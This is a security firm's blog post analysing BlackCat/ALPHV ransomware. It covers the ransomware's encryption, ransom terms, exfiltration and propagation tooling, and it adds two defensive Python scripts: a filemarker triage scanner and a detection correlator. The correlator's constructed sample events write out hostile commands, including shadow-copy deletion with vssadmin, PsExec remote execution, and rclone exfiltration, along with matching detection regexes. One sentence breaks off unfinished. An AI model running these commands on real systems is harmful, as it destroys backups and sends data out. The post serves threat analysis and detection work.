Caleb Boma | December 10th, 2021

BlackCat Ransomware

A new ransomware operation, known as either BlackCat or ALPHV and coded in Rust, was discovered last month. It is potentially one of the more sophisticated variants of the year, with a customizable component allowing for attacks on enterprise networks.

Rust is not usually the primary coding language used by threat actors, but it has been adopted at an increasing rate because of its memory safety and performance. The ransomware, named ALPHV by its developers, is being promoted on Russian-speaking forums. The BlackCat name comes from the favicon on every Tor site containing victim data and was coined by @MalwareHunterTeam on Twitter, although, as of right now, the BlackCat. The Ransomware-as-a-Service (RaaS) operation recruits affiliates to breach and encrypt network devices, much like other RaaS operations.

The ransomware is completely command-line driven, human-operated, and highly configurable. The configurability allows it to use different encryption routines, spread to other computers, kill VMs (including ESXi VMs), and automatically wipe ESXi snapshots to prevent data recovery. Each executable includes a JSON configuration that allows customization of the file extension, the ransom note, how data is encrypted, excluded folders and files, and the services and processes to be automatically terminated.

Ransomware expert Michael Gillespie states that his investigation found no weaknesses that would currently allow free decryption. On Dec. 8, Gillespie tweeted (@demonslay335), “analyzed another sample of this not too long ago but couldn’t talk about it due to client confidentiality… uses AES128-CTR and RSA-2048, is secure. Filemarker 19 47 B7 4d at EOF and before the encrypted key, which is JSON with some settings. Very sophisticated ransomware.”
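For incident responders triaging a suspected BlackCat infection, the trailing filemarker quoted in the tweet is a cheap way to separate encrypted files from files the encryptor never touched. The following Python helper is an added example, not SpearTip's tooling or anything from the ransomware itself; it assumes, based solely on the tweet, that the four bytes 19 47 B7 4D sit at the very end of an encrypted file, and makes no assumption about the rest of the layout.

```python
"""Triage helper: flag files that end with the BlackCat/ALPHV filemarker.

Added example for this post, not SpearTip's code. The only fact used is the
marker bytes quoted from @demonslay335's tweet; the assumption that they are
the final four bytes of the file is drawn from "at EOF" in that tweet.
"""
import os
from pathlib import Path

# Marker quoted in the tweet (hex bytes 19 47 B7 4D), written out verbatim.
BLACKCAT_FILEMARKER = bytes.fromhex("1947b74d")


def has_blackcat_marker(data: bytes) -> bool:
    """Return True when the byte string ends with the filemarker.

    A buffer shorter than the marker can never match; the length check is
    explicit so a negative slice does not silently compare against b''.
    """
    if len(data) < len(BLACKCAT_FILEMARKER):
        return False
    return data[-len(BLACKCAT_FILEMARKER):] == BLACKCAT_FILEMARKER


def file_has_marker(path: Path) -> bool:
    """Read only the tail of the file so large encrypted files stay cheap."""
    size = path.stat().st_size
    if size < len(BLACKCAT_FILEMARKER):
        return False
    with path.open("rb") as fh:
        fh.seek(size - len(BLACKCAT_FILEMARKER))
        return fh.read() == BLACKCAT_FILEMARKER


def scan_tree(root: Path) -> list[Path]:
    """Walk a directory tree and return every path whose tail matches."""
    hits: list[Path] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            candidate = Path(dirpath) / name
            try:
                if file_has_marker(candidate):
                    hits.append(candidate)
            except OSError:
                # Unreadable or vanished file: skip it, do not abort the sweep.
                continue
    return hits


if __name__ == "__main__":
    import sys

    target = Path(sys.argv[1]) if len(sys.argv) > 1 else Path(".")
    for hit in scan_tree(target):
        print(hit)
```

Run it against a mounted image of an affected volume (`python triage.py /mnt/evidence`) to get a list of candidate encrypted files; because only the last four bytes are read per file, the sweep is I/O-light even on large file servers. Treat a match as an indicator to confirm by other means, since any file could in principle end with those four bytes by coincidence.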

In recent instances, ransom negotiations have been hijacked because samples leaked through malware analysis gave outsiders full access to the negotiation. To ensure negotiations aren’t disrupted, the developers added an access token that has to be supplied when launching the encryptor. The token is used to generate the access key needed to enter a negotiation chat on the ransomware group’s leak site. Since the token isn’t embedded in the malware sample, uploading the sample to a malware analysis site doesn’t benefit anyone: without the ransom note from the actual attack, researchers cannot use it to access the negotiation site.

Ransoms in various cases have ranged from $400K to $1M in Monero since BlackCat was first identified in November. If victims attempt to pay in Bitcoin rather than Monero, a 15% fee is added to the ransom.

MalwareHunterTeam told BleepingComputer that the first submission for the new operation was November 21st, but SpearTip’s investigation proves that the ransomware operation was active before this submission.

According to SpearTip’s analysis, BlackCat, coded in Rust, uses 7zip and rclone for data exfiltration. The malware pulled down the STD libraries from GitHub and compiled them on the endpoint, which gave the operators the framework to use Rust commands to enumerate shares and servers, traverse the file system, and laterally propagate the ransomware payload, with the trigger being an access token found in a batch file named start.bat. Self-propagation is accomplished by a built-in function that uses PsExec. BlackCat also has a built-in anti-recovery method that deletes the shadow volume copies using vssadmin.exe.
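The tooling named in that analysis (vssadmin shadow-copy deletion, PsExec for propagation, 7zip for staging and rclone for exfiltration) is all visible in process-creation telemetry, and the value for a defender comes from correlating those sightings on one host rather than alerting on any single command. The detection sketch below is an added example, not SpearTip's or ShadowSpear's detection logic; the pipe-delimited event format and the five sample lines are constructed for the example and do not come from any real incident, and the regular expressions are my own assumptions about how these commands typically appear.

```python
"""Correlate the BlackCat-associated tooling named above across process events.

Added example, not SpearTip's code. Event layout and sample lines are
constructed: "<timestamp>|<host>|<image path>|<command line>".
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample events, not real telemetry. The last line is benign
# (listing shadows) and should not fire the deletion rule.
SAMPLE_EVENTS = [
    "2021-11-20T03:12:41Z|ws01|C:\\Windows\\System32\\vssadmin.exe|vssadmin.exe delete shadows /all /quiet",
    "2021-11-20T03:13:02Z|ws01|C:\\Tools\\PsExec.exe|PsExec.exe \\\\fs02 -s cmd /c start.bat",
    "2021-11-20T03:15:17Z|ws01|C:\\Program Files\\7-Zip\\7z.exe|7z.exe a -p staging.7z D:\\Finance",
    "2021-11-20T03:20:09Z|ws01|C:\\Users\\svc\\rclone.exe|rclone.exe copy staging.7z remote:bucket",
    "2021-11-20T09:00:00Z|ws01|C:\\Windows\\System32\\vssadmin.exe|vssadmin.exe list shadows",
]


@dataclass(frozen=True)
class Alert:
    timestamp: str
    host: str
    rule: str
    command_line: str


# One rule per tool named in the analysis; patterns are case-insensitive
# because the casing of these binaries varies between sightings.
RULES = [
    ("shadow_copy_deletion", re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("psexec_remote_execution", re.compile(r"\bpsexec(64)?(\.exe)?\b", re.I)),
    ("archive_staging_7zip", re.compile(r"\b7za?(\.exe)?\s+a\b", re.I)),
    ("rclone_exfil", re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b", re.I)),
]


def parse_event(line: str) -> Optional[tuple[str, str, str, str]]:
    """Split one event line; return None for malformed input instead of raising."""
    parts = line.split("|", 3)
    if len(parts) != 4:
        return None
    timestamp, host, image, cmd = parts
    return timestamp, host, image, cmd


def evaluate(lines: list[str]) -> list[Alert]:
    """Run every rule over the command line of every well-formed event."""
    alerts: list[Alert] = []
    for line in lines:
        parsed = parse_event(line)
        if parsed is None:
            continue
        timestamp, host, _image, cmd = parsed
        for name, pattern in RULES:
            if pattern.search(cmd):
                alerts.append(Alert(timestamp, host, name, cmd))
    return alerts


def rules_by_host(alerts: list[Alert]) -> dict[str, set[str]]:
    """Group the distinct rule names that fired on each host."""
    seen: dict[str, set[str]] = {}
    for alert in alerts:
        seen.setdefault(alert.host, set()).add(alert.rule)
    return seen


def high_confidence_hosts(alerts: list[Alert], minimum_rules: int = 2) -> list[str]:
    """Hosts where at least `minimum_rules` different techniques were observed.

    A lone 7zip or PsExec event is common administrative noise; shadow-copy
    deletion plus staging or exfiltration on the same host is not.
    """
    return sorted(h for h, rules in rules_by_host(alerts).items() if len(rules) >= minimum_rules)


if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f"{a.timestamp} {a.host} {a.rule}: {a.command_line}")
    print("high confidence:", high_confidence_hosts(evaluate(SAMPLE_EVENTS)))
```

The correlation step is the part worth keeping when porting this to a real SIEM: a 7zip archive or a PsExec session on its own is routine, but the same host deleting shadow copies, staging an archive and invoking rclone within a short window is the sequence described in the analysis above. Thresholds and patterns here are starting points to tune against your own baseline, not production signatures.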

Further investigation into the leak sites shows that ALPHV (knife favicon) and BlackCat (black cat favicon) have different sites, but they appear to be synonymous given the timing of their appearance and the similarities in access.

This group is evidence of the continued evolution of threat actor tactics: they were very destructive, deleting backups and logs, changing firewall and Azure credentials, and carrying out other malicious behavior. If your organization is dealing with a BlackCat ransomware attack, call SpearTip and our engineers will begin mitigating the attack immediately. A better approach is to proactively improve the posture of your security environment or continuously monitor for threats with our ShadowSpear Platform. Don’t hesitate to contact us with issues arising from constant threats, and be vigilant with your security measures.